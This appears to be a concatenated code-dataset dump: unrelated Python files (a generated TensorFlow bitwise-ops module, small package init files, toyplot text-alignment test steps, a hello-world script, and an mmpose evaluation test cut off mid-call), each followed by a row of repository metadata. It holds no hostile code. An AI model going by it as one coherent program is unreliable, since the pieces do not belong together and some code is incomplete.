from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
def bitwise_and(x, y, name=None):
r"""Elementwise computes the bitwise AND of `x` and `y`.
The result will have those bits set, that are set in both `x` and `y`. The
computation is performed on the underlying representations of `x` and `y`.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
y: A `Tensor`. Must have the same type as `x`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BitwiseAnd", x=x, y=y, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, y], _ctx)
(x, y) = _inputs_T
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x, y]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BitwiseAnd", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BitwiseAnd", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def bitwise_or(x, y, name=None):
r"""Elementwise computes the bitwise OR of `x` and `y`.
The result will have those bits set, that are set in `x`, `y` or both. The
computation is performed on the underlying representations of `x` and `y`.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
y: A `Tensor`. Must have the same type as `x`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BitwiseOr", x=x, y=y, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, y], _ctx)
(x, y) = _inputs_T
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x, y]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BitwiseOr", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BitwiseOr", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def bitwise_xor(x, y, name=None):
r"""Elementwise computes the bitwise XOR of `x` and `y`.
The result will have those bits set, that are different in `x` and `y`. The
computation is performed on the underlying representations of `x` and `y`.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
y: A `Tensor`. Must have the same type as `x`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BitwiseXor", x=x, y=y, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, y], _ctx)
(x, y) = _inputs_T
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x, y]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BitwiseXor", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BitwiseXor", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def invert(x, name=None):
r"""Flips all bits elementwise.
The result will have exactly those bits set, that are not set in `x`. The
computation is performed on the underlying representation of x.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"Invert", x=x, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, (x,) = _execute.args_to_matching_eager([x], _ctx)
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Invert", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"Invert", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def population_count(x, name=None):
r"""Computes element-wise population count (a.k.a. popcount, bitsum, bitcount).
For each entry in `x`, calculates the number of `1` (on) bits in the binary
representation of that entry.
**NOTE**: It is more efficient to first `tf.bitcast` your tensors into
`int32` or `int64` and perform the bitcount on the result, than to feed in
8- or 16-bit inputs and then aggregate the resulting counts.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `uint8`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"PopulationCount", x=x, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, (x,) = _execute.args_to_matching_eager([x], _ctx)
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"PopulationCount", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"PopulationCount", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "BitwiseAnd"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "y"
# type_attr: "T"
# }
# output_arg {
# name: "z"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# is_commutative: true
# }
# op {
# name: "BitwiseOr"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "y"
# type_attr: "T"
# }
# output_arg {
# name: "z"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# is_commutative: true
# }
# op {
# name: "BitwiseXor"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "y"
# type_attr: "T"
# }
# output_arg {
# name: "z"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# is_commutative: true
# }
# op {
# name: "Invert"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# output_arg {
# name: "y"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# }
# op {
# name: "PopulationCount"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# output_arg {
# name: "y"
# type: DT_UINT8
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n>\n\nBitwiseAnd\022\006\n\001x\"\001T\022\006\n\001y\"\001T\032\006\n\001z\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\220\001\001\n=\n\tBitwiseOr\022\006\n\001x\"\001T\022\006\n\001y\"\001T\032\006\n\001z\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\220\001\001\n>\n\nBitwiseXor\022\006\n\001x\"\001T\022\006\n\001y\"\001T\032\006\n\001z\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\220\001\001\n/\n\006Invert\022\006\n\001x\"\001T\032\006\n\001y\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\n7\n\017PopulationCount\022\006\n\001x\"\001T\032\005\n\001y\030\004\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021")
| 29.710145 | 753 | 0.622829 | 1,480 | 10,250 | 4.028378 | 0.133784 | 0.03103 | 0.013083 | 0.015263 | 0.777256 | 0.72895 | 0.722912 | 0.702784 | 0.702784 | 0.682657 | 0 | 0.061643 | 0.238732 | 10,250 | 344 | 754 | 29.796512 | 0.702422 | 0.44478 | 0 | 0.639344 | 1 | 0.02459 | 0.111582 | 0.080044 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04918 | false | 0 | 0.090164 | 0 | 0.188525 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
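These generated wrappers are what TensorFlow's public tf.bitwise namespace dispatches to. A small usage sketch (under TF 2.x eager execution the printed tensors show the computed values):

import tensorflow as tf

x = tf.constant([0b1010], dtype=tf.int32)
y = tf.constant([0b0110], dtype=tf.int32)
print(tf.bitwise.bitwise_and(x, y))  # bits set in both -> [2]  (0b0010)
print(tf.bitwise.bitwise_or(x, y))   # bits set in either -> [14] (0b1110)
print(tf.bitwise.bitwise_xor(x, y))  # bits that differ -> [12] (0b1100)
print(tf.bitwise.invert(x))          # flips all 32 bits of each int32 element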
16972a7bcb2a072262ccecd541935694e1b51bbb | 78 | py | Python | example/app/tests/utils/__init__.py | texastribune/tx_salaries | 197d8da4e1783216830b8d0a5adb23c0200fd3e8 | [
"Apache-2.0"
] | 6 | 2016-05-18T05:53:44.000Z | 2019-06-13T18:27:50.000Z | example/app/tests/utils/__init__.py | texastribune/tx_salaries | 197d8da4e1783216830b8d0a5adb23c0200fd3e8 | [
"Apache-2.0"
] | 64 | 2015-02-13T18:29:04.000Z | 2018-06-15T19:48:56.000Z | example/app/tests/utils/__init__.py | texastribune/tx_salaries | 197d8da4e1783216830b8d0a5adb23c0200fd3e8 | [
"Apache-2.0"
] | 2 | 2015-05-08T19:22:12.000Z | 2016-07-11T16:57:49.000Z | from .transformer import *
from .transformers import *
from .cleaver import *
| 19.5 | 27 | 0.769231 | 9 | 78 | 6.666667 | 0.555556 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 78 | 3 | 28 | 26 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16a457972570ee9009d2e82740383cbda0b33fe3 | 6,096 | py | Python | features/steps/text.py | eaton-lab/toyplot | 472f2f2f1bc048e485ade44d75c3ace310be4b41 | [
"BSD-3-Clause"
] | 438 | 2015-01-06T20:54:02.000Z | 2022-03-15T00:39:33.000Z | features/steps/text.py | eaton-lab/toyplot | 472f2f2f1bc048e485ade44d75c3ace310be4b41 | [
"BSD-3-Clause"
] | 184 | 2015-01-26T17:04:47.000Z | 2022-02-19T16:29:00.000Z | features/steps/text.py | eaton-lab/toyplot | 472f2f2f1bc048e485ade44d75c3ace310be4b41 | [
"BSD-3-Clause"
] | 45 | 2015-07-06T18:00:27.000Z | 2022-02-14T12:46:17.000Z | # Copyright 2014, Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains certain
# rights in this software.
from behave import *
import nose.tools
import toyplot.html
@given(u'text with default alignment')
def step_impl(context):
context.axes.text(0, 0, "Text!", style={"font-size": "24px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with left alignment')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "text-anchor": "start"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with center alignment')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "text-anchor": "middle"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with right alignment')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "text-anchor": "end"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with positive anchor shift')
def step_impl(context):
context.axes.text(
0,
0,
"Text!",
style={
"font-size": "24px",
"text-anchor": "middle",
"-toyplot-anchor-shift": "10px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with negative anchor shift')
def step_impl(context):
context.axes.text(
0,
0,
"Text!",
style={
"font-size": "24px",
"text-anchor": "middle",
"-toyplot-anchor-shift": "-10px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with angled anchor shift')
def step_impl(context):
context.axes.text(
0,
0,
"+++",
angle=30,
style={
"font-size": "32px",
"-toyplot-anchor-shift": "10px"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment top')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "top",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment first baseline')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "first-baseline",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment middle')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "middle",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment last baseline')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "last-baseline",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with vertical alignment bottom')
def step_impl(context):
text = """First line<br/>Second line<br/>Third line"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
"-toyplot-vertical-align": "bottom",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with alignment baselines')
def step_impl(context):
text = """<span style="alignment-baseline:alphabetic">Alphabetic</span>
<span style="alignment-baseline:middle">Middle</span>
<span style="alignment-baseline:central">Central</span>
<span style="alignment-baseline:hanging">Hanging</span>"""
context.axes.text(
0,
0,
text,
style={
"font-size": "24px",
})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with positive baseline shift')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "baseline-shift": "100%"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with negative baseline shift')
def step_impl(context):
context.axes.text(
0, 0, "Text!", style={"font-size": "24px", "baseline-shift": "-100%"})
context.axes.scatterplot(0, 0, color="black")
@given(u'text with angled baseline shift')
def step_impl(context):
context.axes.text(
0, 0, "+++", angle=30, style={"font-size": "32px", "baseline-shift": "10px"})
context.axes.scatterplot(0, 0, color="black")
@when(u'text is aligned with an unknown text-anchor value, an exception is raised.')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.axes.text(
0, 0, "Text!", style={"text-anchor": "foo"})
toyplot.html.render(context.canvas)
@when(u'text is aligned with an unknown alignment-baseline value, an exception is raised.')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.axes.text(
0, 0, "Text!", style={"alignment-baseline": "foo"})
toyplot.html.render(context.canvas)
@given(u'rich text {markup}')
def step_impl(context, markup):
context.axes.text(0, 0, markup, color=toyplot.color.black, style={"font-size": "32px"})
@given(u'text using font-family {family}')
def step_impl(context, family):
context.axes.text(0, 0, "Font-family: %s" % family, style={"font-family": family, "font-size": "32px"})
@when(u'text is drawn with an unknown font family, an exception is raised.')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.axes.text(0, 0, "Font-family: nonexistent", style={"font-family": "nonexistent", "font-size": "32px"})
context.canvas._repr_html_()
| 27.963303 | 118 | 0.610072 | 788 | 6,096 | 4.685279 | 0.125635 | 0.110238 | 0.062568 | 0.102384 | 0.800921 | 0.765981 | 0.748104 | 0.738082 | 0.721289 | 0.709642 | 0 | 0.030124 | 0.221293 | 6,096 | 217 | 119 | 28.092166 | 0.74763 | 0.027395 | 0 | 0.688623 | 0 | 0 | 0.348979 | 0.063819 | 0 | 0 | 0 | 0 | 0.017964 | 1 | 0.125749 | false | 0 | 0.017964 | 0 | 0.143713 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
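A condensed, standalone version of what these behave steps exercise — placing styled text and a marker on Cartesian axes (assuming a toyplot installation; the values mirror the steps above):

import toyplot

canvas = toyplot.Canvas(width=300, height=300)
axes = canvas.cartesian()
axes.text(0, 0, "Text!", style={"font-size": "24px", "text-anchor": "middle"})
axes.scatterplot(0, 0, color="black")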
16a8fb3470aea2a03cbda65e50d77f5d1e1f56c3 | 39 | py | Python | Code.py | Prymthon/Chesster | b343e95fe8b9d11629e85c765ceb9a4800919f8b | [
"MIT"
] | null | null | null | Code.py | Prymthon/Chesster | b343e95fe8b9d11629e85c765ceb9a4800919f8b | [
"MIT"
] | null | null | null | Code.py | Prymthon/Chesster | b343e95fe8b9d11629e85c765ceb9a4800919f8b | [
"MIT"
] | null | null | null | # W.I.P.
print("Hello, I am Chesster")
| 13 | 29 | 0.615385 | 8 | 39 | 3 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 39 | 2 | 30 | 19.5 | 0.727273 | 0.153846 | 0 | 0 | 0 | 0 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
16bc58fda13e5293aaa8e61708a5d8246dc675c2 | 35 | py | Python | pygeofilter/backends/sql/__init__.py | rsmith013/pygeofilter | cf3ac068d37a0895a3f88e2aa3a7d375911acc0b | [
"MIT"
] | null | null | null | pygeofilter/backends/sql/__init__.py | rsmith013/pygeofilter | cf3ac068d37a0895a3f88e2aa3a7d375911acc0b | [
"MIT"
] | null | null | null | pygeofilter/backends/sql/__init__.py | rsmith013/pygeofilter | cf3ac068d37a0895a3f88e2aa3a7d375911acc0b | [
"MIT"
] | null | null | null | from .evaluate import to_sql_where
| 17.5 | 34 | 0.857143 | 6 | 35 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16db87a2b4a4f981e77a044f8ed63ac7a758371c | 211 | py | Python | core/extensions/sim/__init__.py | yunnant/kungfu | 03dba19c922a5950068bd2d223488b8543ad8dd1 | [
"Apache-2.0"
] | null | null | null | core/extensions/sim/__init__.py | yunnant/kungfu | 03dba19c922a5950068bd2d223488b8543ad8dd1 | [
"Apache-2.0"
] | 1 | 2019-08-23T01:52:33.000Z | 2019-08-23T01:52:33.000Z | core/extensions/sim/__init__.py | yunnant/kungfu | 03dba19c922a5950068bd2d223488b8543ad8dd1 | [
"Apache-2.0"
] | null | null | null | from . import kfext_sim as ext
from extensions import EXTENSION_REGISTRY_MD, EXTENSION_REGISTRY_TD
EXTENSION_REGISTRY_MD.register_extension('sim', ext.MD)
EXTENSION_REGISTRY_TD.register_extension('sim', ext.TD)
| 42.2 | 67 | 0.853081 | 31 | 211 | 5.451613 | 0.387097 | 0.402367 | 0.224852 | 0.248521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07109 | 211 | 4 | 68 | 52.75 | 0.862245 | 0 | 0 | 0 | 0 | 0 | 0.028436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
bc6d1c7bdae956b64de9a0347107c74e7a6a2809 | 32 | py | Python | src/usaspending_client/__init__.py | jeff-tilton/usaspending_client | dbde16f89ce0bd171bd393692b938000f90f4a7b | [
"MIT"
] | null | null | null | src/usaspending_client/__init__.py | jeff-tilton/usaspending_client | dbde16f89ce0bd171bd393692b938000f90f4a7b | [
"MIT"
] | null | null | null | src/usaspending_client/__init__.py | jeff-tilton/usaspending_client | dbde16f89ce0bd171bd393692b938000f90f4a7b | [
"MIT"
] | null | null | null | from .client import USASpending
| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bc737c9c939db579d1f2587203d42efde703941c | 66 | py | Python | ir_attachment_url/tests/__init__.py | 001101/misc-addons | 6f3b94d8a71d603d9ad449f96edfc66385e78080 | [
"MIT"
] | null | null | null | ir_attachment_url/tests/__init__.py | 001101/misc-addons | 6f3b94d8a71d603d9ad449f96edfc66385e78080 | [
"MIT"
] | 1 | 2020-05-03T04:27:29.000Z | 2020-05-03T04:27:29.000Z | ir_attachment_url/tests/__init__.py | eneldoserrata/misc-addons | 6f3b94d8a71d603d9ad449f96edfc66385e78080 | [
"MIT"
] | 1 | 2022-02-04T11:27:12.000Z | 2022-02-04T11:27:12.000Z | from . import test_data_get
from . import test_product_tmpl_image
| 22 | 37 | 0.848485 | 11 | 66 | 4.636364 | 0.727273 | 0.392157 | 0.54902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 66 | 2 | 38 | 33 | 0.87931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
bcb3788adeb63e41e5addc21dfdeef25b00bbb42 | 6,393 | py | Python | tests/test_evaluation/test_bottom_up_eval.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | tests/test_evaluation/test_bottom_up_eval.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | tests/test_evaluation/test_bottom_up_eval.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | import copy
import numpy as np
import torch
from mmpose.core import (aggregate_results, get_group_preds,
get_multi_stage_outputs)
def test_get_multi_stage_outputs():
fake_outputs = [torch.zeros((1, 4, 2, 2))]
fake_flip_outputs = [torch.ones((1, 4, 2, 2))]
# outputs_flip
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=4, with_heatmaps=[False],
with_ae=[True])
assert heatmaps == []
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=2, with_heatmaps=[True],
with_ae=[True])
assert len(heatmaps) == 1
flip_index = [1, 0]
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True],
with_ae=[True], flip_index=flip_index)
assert len(heatmaps) == 2
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
tag_per_joint=False,
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True],
with_ae=[True], flip_index=flip_index)
assert len(heatmaps) == 2
# with heatmaps & with ae
fake_outputs = [torch.zeros((1, 4, 2, 2)), torch.ones((1, 2, 4, 4))]
fake_flip_outputs = [torch.ones((1, 4, 2, 2)), torch.ones((1, 2, 4, 4))]
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=2, with_heatmaps=[True, False],
with_ae=[True, True])
assert torch.allclose(heatmaps[0], torch.tensor(0.))
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True, True],
with_ae=[True, False])
assert torch.allclose(heatmaps[0], torch.tensor(0.5))
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True, False],
with_ae=[True, False], flip_index=flip_index)
assert torch.allclose(heatmaps[0], torch.tensor(0.))
# size_projected
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=None,
num_joints=2, with_heatmaps=[True, True],
with_ae=[True, False],
size_projected=(8, 8))
assert heatmaps[0].shape == torch.Size([1, 2, 8, 8])
outputs, heatmaps, tags = \
get_multi_stage_outputs(outputs=copy.deepcopy(fake_outputs),
outputs_flip=fake_flip_outputs,
num_joints=2, with_heatmaps=[True, True],
with_ae=[True, False],
align_corners=True)
assert torch.allclose(heatmaps[0], torch.tensor(0.5))
def test_aggregate_results():
fake_heatmaps = [torch.zeros((1, 2, 2, 2))]
fake_tags = [torch.zeros((1, 2, 2, 2))]
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=None, tags_list=[],
heatmaps=fake_heatmaps, tags=fake_tags,
test_scale_factor=[1], project2image=True,
flip_test=False)
assert torch.allclose(aggregated_heatmaps, torch.tensor(0.))
fake_aggr_heatmaps = torch.ones(1, 2, 2, 2)
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=fake_aggr_heatmaps,
tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1],
project2image=True, flip_test=False)
assert torch.allclose(aggregated_heatmaps, torch.tensor(1.))
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=fake_aggr_heatmaps,
tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1],
project2image=True, flip_test=False,
align_corners=True)
assert torch.allclose(aggregated_heatmaps, torch.tensor(1.))
fake_heatmaps = [torch.zeros((1, 2, 2, 2)), torch.ones((1, 2, 2, 2))]
fake_aggr_heatmaps = torch.ones(1, 2, 4, 4)
aggregated_heatmaps, tags_list = \
aggregate_results(scale=1, aggregated_heatmaps=fake_aggr_heatmaps,
tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1],
project2image=False, flip_test=True)
assert aggregated_heatmaps.shape == torch.Size((1, 2, 4, 4))
aggregated_heatmaps, tags_list = \
aggregate_results(scale=2, aggregated_heatmaps=fake_aggr_heatmaps,
